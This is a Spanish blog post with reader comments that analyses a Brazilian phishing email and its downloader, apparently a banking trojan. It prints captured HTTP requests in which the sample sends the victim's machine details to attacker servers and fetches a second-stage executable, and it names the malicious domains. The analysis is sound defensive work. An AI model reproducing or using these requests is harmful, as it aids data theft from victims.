viernes, 9 de julio de 2010

Los chicos de brazil y sus troyanos (botnet?)

Hoy a la siesta mientras esperabamos a Nicolás, Fernando desarmaba una xbox y yo... leía un poco de DB2 me llegó un mail de un contacto del messenger que jamás me escribiría un mail xD. Cuando leo el mail, claramente no era del remitente que acusaba ser, (incluso hotmail lo detectó como posible falsificación) ya que venía escrito en portugues :P y dice:

Desculpa, por nao ter enviado logo, mas ai esta o album para visualizar ta ....


CLIQUE PARA VISUALIZAR
-0.36152

Que si mi pésimo portugues de secundario no se equivoca significa: "Perdona por no haberte enviado el logo, aqui está el album para ver...", gracioso. En fin..., viendo el link un poco dije... veamos que me trae este dulce mail xD: "http://correioss.info/visualizar . php?=fotosaniversario.html?0.36152", (notese los espacios en el punto" . ") el link nos pide descargar un hermoso ejecutable (visualizar.exe).

http://correioss.info ... "It works!" para el que alguna vez instaló apache en un debian (por ejemplo), este es el mensaje por defecto de una instalación exitosa :D. Los chicos instalaron apache para jugar... Y como jugar es divertido empecé a buscar directorios interesantes en el servidor, vean http://correioss.info/php/ :








Un login :P, los chicos tienen un login para jugar!!! bien... probando un nombre cualquiera a ver si me dejan jugar a mi también :D:

Apaaaaa!!! parece que juan no está invitado a la fiesta de don "S1turn0" y no tengo ningún infectado :P. Al parecer los chicos perdieron un archivo relatorio.html.
El sitio está dividido en 3 frames, el superior es cont.php, el del medio es relatorio.html y el de abajo rdp.php.
logout es un enlace a un lugar llamado: http://www.site.com.br/contador/ que no es mas que una imagen de un 0 (en este caso), www.site.com.br es el sitio de un hosting de brazil...

 Como me fui quedando sin ideas decidí ver que pretendía de mi la invitación (visualizar.exe), a diferencia de los archivos "analizados" anteriormete este es mas divertido :P.

Entonces ejecuté el archivito en cuestión en un entorno un tanto aislado (windows XP SP3 + SandBoxie + con conexión a internet).
Lo que sucedio fue:
1-Pidio una resolución de nombres para el dominio correioss.info y con la ip devuelta hiso lo siguiente:

/*PETICION*/
POST /php/contador.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
Host: correioss.info
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

computador=JUAN%2DAA57CF7254&usuario=Administrador&shd_fisico=00EE2004&shd_firmware=0485F93D&mac=00%2D0C%2D29%2D6C%2DC1%2D1A&windir=&pag_inic=http%3A%2F%2Fla%2F&

/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:42:28 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4.5
Content-Length: 236
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html



Warning:  fopen(08-Jul-2010 23-42-29.html) [function.fopen]: failed to open stream: Permission denied in /var/www/php/contador.php on line 15

Nao pude abrir o seu arquivo...

Divertido como se hicieron con mi nombre de usuario, dirección mac, etc... JA! estos chicos molestos. Pero al parecer no pudieron registrar mucho porque falló la operación fopen por permisos denegados xD.

2-No les alcanzó con cargarse mis datos, vinieron por mas... ahora el bichito intenta acceder a una suerte de login con:

/*PETICION*/
GET /php/acesso.php HTTP/1.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Host: correioss.info
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:42:29 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4.5
Content-Length: 934
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

Warning:  fopen(acessos.txt) [function.fopen]: failed to open stream: Permission denied in /var/www/php/acesso.php on line 3
Warning:  fread(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 4
Warning:  fclose(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 5
Warning:  fopen(acessos.txt) [function.fopen]: failed to open stream: Permission denied in /var/www/php/acesso.php on line 7
Warning:  fputs(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 8
Warning:  fclose(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 9

Pero siguen sin poder escribir en el archivo acessos.txt :(, que de hecho tiene un 0 guardado xD.

3-Y bueno... (pensé que no daba para mas...) ahora se le ocurrió descargar otro bichito mas oO...

/*PETICION*/
GET /nero1.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: correioss.info
Connection: Keep-Alive

/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:42:32 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Wed, 07 Jul 2010 14:49:37 GMT
ETag: "7f98680-233600-48acd475c4240"
Accept-Ranges: bytes
Content-Length: 2307584
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program

Como se imaginaran en esta respuesta llegó una buena cantidad de bytes correspondientes al archivo "nero1.exe" que acaba de descargarse.

El ultimo mensaje http es el siguiente:

NTkrnl Secure Suite
Version 0.1
Metamorphism Portable Executable (PE) Packer and Protector Library
Copyright . 2006-2007 Ashkbiz Danehkar
All Rights Reserved

Homepage: http://www.ntkrnl.com 
E-mail: info@ntkrnl.com NTkrnl Geborgene Zeug
Version 0.1
Metamorphismus Portable Executable (PE) Packer und Besch.tzer Bibliothek
Urheberrechtlicher . 2006-2007 Ashkbiz Danehkar
Alle Rechten reservierten

HauseSeite: http://www.ntkrnl.com  
E-Mail: info@ntkrnl.com NTkrnl Sicuro Seguito
Version 0.1
Metamorphism Portable Eseguibile (PE) Biblioteca del Imballatore e del Protettore
Propriet. letterario riservato . 2006-2007 Ashkbiz Danehkar

Casa pagina: http://www.ntkrnl.com 
E-mail: info@ntkrnl.com

JA!, el sitio está fuera, pero básicamente consiste en una suerte de protector de código (para que la gente que sabe de estas cosas no pueda descubrir el real funcionamiento del bichito).

Pero no termina aca :P, re denso son los tipitos estos jaja.

4-Al parecer como todo iba mal en el dominio .info los chicos levantaron otro server en el dominio .net :P, el bichito pidio una resolución de nombres para www.correioss.net (ambas ips muy similares...). Una vez obtenida la ip conversaron un poco:

/*PETICION*/
POST /enter.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Host: www.correioss.net
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

tipo=cli&cli=JUAN%2DAA57CF7254&

/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:43:57 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4
Content-Length: 2
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

OK

ok? qué??? eso es todo? en la peticion se aclaran dos cosas un tipo=cli (cliente ?) y el nombre del cliente :P, yo!.

5-JA!, mirá lo que hacen los nenessssss!!!

/*PETICION*/
POST /atualizado/update.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Host: correioss.net
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

praquem=wwwcaix%40gmail%2Ecom&titulo=JUAN%2DAA57CF7254+007&texto=%2E%2E%2E%2E%2Eby%2Ecyrus%2E%23%40%2E%2E%2E%2E%2E%0D%0AAtualizada+para%3A+007%0D%0A&

/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:43:58 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

Que tiernosss ¬¬, ahora están poniendose al día :P, /atualizado/update.php contiene la siguiente info:

praquem=wwwcaix@gmail.com&titulo=JUAN-AA57CF7254 007&texto=.....by.cyrus.#@..... Atualizada para: 007 &

Osea que ahora wwwcaix@gmail.com recibe un mail con mis datos :P, "hola caix soy juan ¬¬" y cyrus no pudo contenerse e incluirse en el contenido del mail :P.

6-Luego algo extraño que no voy a incluir hasta no estar seguro.

7-Otra resolución de nombres :D, esta vez por www.itau.com.br

/*PETICION*/
GET / HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.itau.com.br
Connection: Keep-Alive
/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:41:23 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 14 May 2010 22:16:22 GMT
ETag: "265e-16c7-39a1d980"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1410
Keep-Alive: timeout=5, max=500000
Connection: Keep-Alive
Content-Type: text/html

Esta parte realmente me dio cagaso... itaú es un banco brasilero... Aparentemente en este punto no fue mas que un get al sitio del banco... o al menos eso parece... voy a ver un poco mas sobre este punto cuando tenga tiempo.

8-Otra resolución, esta vez por updater.hd1.com.br y buscando lo siguiente:

/*PETICION*/
GET /versaoatual.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: updater.hd1.com.br
Connection: Keep-Alive

/*RESPUESTA*/
HTTP/1.1 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-803475731"
Last-Modified: Wed, 07 Jul 2010 15:52:35 GMT
Content-Length: 3
Date: Fri, 09 Jul 2010 04:42:03 GMT
Server: lighttpd/1.4.19

007

/*PETICION*/
GET /downloadkey.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: updater.hd1.com.br
Connection: Keep-Alive




/*RESPUESTA*/
HTTP/1.1 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "129092051"
Last-Modified: Sun, 04 Jul 2010 06:36:48 GMT
Content-Length: 31
Date: Fri, 09 Jul 2010 04:42:03 GMT
Server: lighttpd/1.4.19

http://correioss.info/nero1.exe

Se acaban de descargar dos archivos... versaoatual.txt y downloadkey.txt... con información poco relevante a esta altura versaoatual.txt=007 y downloadkey.txt=http://correioss.info/nero1.exe. 007 número apropiado cierto? :P.

Habría que escribir a nuestro amigo wwwcraix un mail???

5 comentarios:

  1. Prometo la próxima vez no incluir completamente los encabezados http :P

    ResponderEliminar
  2. nero1.exe es un "pequeño" cliente de 3.3Mb... kl Banker... un conocido troyano para el robo de información bancaria... cada vez mas feito esto ajjaja.

    ResponderEliminar
  3. Codificado en delphi, bastante configurable diría... hay sitios que explican como utilizarlo...

    Buen pdf al respecto:
    http://www.virusbtn.com/pdf/conference_slides/2009/Bestuzhev-VB2009.pdf

    ResponderEliminar
  4. updater.hd1.com.br un sitio hospedado en HDFree (otro hosting brasilero).
    /versaoatual.txt aparentemente indicaría la version actual del software que se está propagando.
    /downloadkey.txt indica la dirección donde se encuentra el malware.

    ResponderEliminar
  5. Excelente analisis, muchas gracias, ya había estado recibiendo este correo o similares multitud de veces, aunque por ser tan focalizados a brazil no son tan creibles en otros paises donde el portugues no es el idioma nacional.

    ResponderEliminar